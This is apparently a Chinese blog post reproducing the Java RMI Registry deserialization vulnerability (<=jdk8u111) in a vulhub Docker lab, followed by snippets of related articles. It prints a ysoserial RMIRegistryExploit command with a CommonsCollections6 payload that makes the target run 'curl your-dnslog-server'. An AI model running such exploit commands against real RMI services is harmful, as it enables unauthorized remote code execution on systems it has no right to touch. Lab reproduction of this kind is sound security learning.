Java RMI Registry 反序列化漏洞(<=jdk8u111)

最新推荐文章于 2024-03-10 09:15:00 发布
最新推荐文章于 2024-03-10 09:15:00 发布
阅读量984 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: java docker

Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).

漏洞环境

执行如下命令编译及启动RMI Registry和服务器:

docker-compose build
docker-compose run -e RMIIP=your-ip -p 1099:1099 rmi

 

环境启动后,RMI Registry监听在1099端口。

漏洞复现

通过ysoserial的exploit包中的RMIRegistryExploit进行攻击

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"

 dnslog获取域名

 

 

关云chnag
关注
专栏目录
Java-rmi-registry反序列化漏洞复现
0xSec
12-25 1694
java.rmi.registryjava语言的一个包
Java RMI Registry 反序列化漏洞复现(jdk8u232_b09)
0xSec
02-20 1190
Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1)。
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Java RMI Registry 反序列化漏洞(=jdk8u111)
黑白的博客
12-23 1690
声明 好好学习,天天向上 漏洞描述 Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1). 影响范围 <=jdk8u111 复现过程 使用vulhub /ap
Java RMI 反序列化漏洞-远程命令执行
tangshuangsss的专栏
12-22 2989
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介RMI即远程方法调用,通俗的来说就是客户端可以调用服务端的方法。和RPC差不多,RMIjava独立实现的...
java rmi registry 反序列化漏洞(<jdk8u232_b09) 复现
12-14
Java RMI Registry反序列化漏洞是指在JDK 8u232_b09(以及之前的版本)中存在一个漏洞,导致攻击者可以利用该漏洞在目标系统上执行任意代码。 要复现这个漏洞,可以按照以下步骤进行: 1. 准备环境:首先,需要...
Java RMI Registry 反序列化漏洞
玄道的网安博客
01-30 1635
漏洞概述 Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1). 影响版本 <=jdk8u111 环境搭建 这里使用...
复现java反序列化漏洞的方法
weixin_47623655的博客
03-30 1678
在本文中,我们学习了如何使用ysoserial来生成恶意payload,以及如何利用Python的SimpleHTTPServer模块来搭建一个HTTP服务器来接收Tomcat发送的数据包。当反序列化一个包含恶意代码的序列化数据时,攻击者可以利用该漏洞在目标系统上执行任意代码,导致系统崩溃或数据泄露。通过上面的步骤,我们可以成功地复现Java反序列化漏洞,并在使用ysoserial生成恶意payload之后,我们需要将其发送到目标服务器进行验证漏洞是否存在。接下来,我们需要构造一个包含这个类的序列化数据。
rmi 反序列化漏洞_Java反序列化漏洞详解
weixin_36319281的博客
12-31 561
阅读:26,150Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化漏洞简述后,并对于Java反序列化的Poc进行详细解读。Java反序列化漏洞简介Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方...
java rmi反序列化漏洞 简介
whatday的专栏
07-01 955
目录 一、RMI简介 二、RMI示例 三、漏洞复现 四、漏洞分析 1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明? 2、为什么不直接将badAttributeValueExpException对象bind到RMI服务? 一、RMI简介 首先看一下RMI在wikipedia上的描述: Java远程方法调用,即Java RMIJava Remote Method Invocation)是Java编程语言里,一种用于实现远程.
Commons Collections Java反序列化漏洞利用
parker的专栏
04-11 2520
0x00 漏洞原理与成因  漏洞作者写的技术分析:http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 腾讯TSRC:  https://security.t
java rmi register反序列化攻击
Shanfenglan's blog
12-16 1895
文章目录1. 前言2. 利用参考文章 1. 前言 被攻击的是 rmi register服务端,一般在1099端口。如果遇见了暴露的1099端口可以尝试攻击一下。 2. 利用 报错不用管,命令会正常执行 报错不用管,命令会正常执行 #发送给服务器payloads/JRMPLIstener数据,rmi服务器会开启一个服务,攻击者使用JRMPClient与这个服务进行通行进而进行命令执行。 条件jdk<=jdk8u111 java -cp ysoserial.jar ysoserial.exploit.J
Java RMI详解
qq_39297233的博客
10-09 207
Java程序中引用类型(不包括基本类型)的参数传递是按引用传递的,对于在同一个虚拟机中的传递时是没有问题的,因为的参数的引用对应的是同一个内存空间,在分布式系统中,由于对象不存在于同一个内存空间,虚拟机A的对象引用对于虚拟机B没有任何意义,那么怎么解决这个问题呢?远程对象一般分布在服务器端,当客户端试图调用远程对象的方法时,如果在客户端还不存在远程对象所依赖的类文件,比如远程方法的参数和返回值对应的类文件,客户就会从 java.rmi.server.codebase 系统属性指定的位贸动态加载该类文件。
RMI Bypass Jep290(Jdk8u231) 反序列化漏洞分析
爱国小白帽
07-26 1531
360-CERT [三六零CERT](javascript:void(0)???? 前天 0x00 漏洞简述 随着RMI的进一步发展,RMI上的反序列化攻击手段正逐渐增多,该类漏洞最近正受到愈加广泛的关注。 RMI (Java Remote Method Invocation) 是Java远程方法调用,是一种允许一个 JVM 上的 object 调用另一个 JVM 上 object 方法的机制,在Java RMI 的通信过程中存在反序列化漏洞,攻击者能够利用该漏洞造成代码执行,漏洞等级:高危。 在JDK8
漏洞名称:RMI 未授权访问漏洞
qq_36902628的博客
03-21 1780
漏洞名称:RMI 未授权访问漏洞
漏洞名称-RMI 未授权访问漏洞
最新发布
qq_44005305的博客
03-10 1220
漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache CommonsCollections的漏洞版本,就可以在该服务器上执行相关命令。漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API接口,可直接被非法增删改次数据。且因为攻击是在未认证下进行的,所以后续无法通过定位用户进行异常排查。
检测java rmi服务对外,java-是否有有效的方法来测试RMI服务器是否已启动?
weixin_34663443的博客
03-11 572
我有一个RMI客户端测试,如果RMI服务器正在运行并且可以访问.此刻,我每隔几秒钟执行一次此测试:try {rMIinstance.ping();} catch (RemoteException e) {getInstanceRegister().removeInstance(rMIinstance);}(ping()是一个简单的虚拟RMI调用.)如果实例处于脱机状态,则大约1分钟后java.ne...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值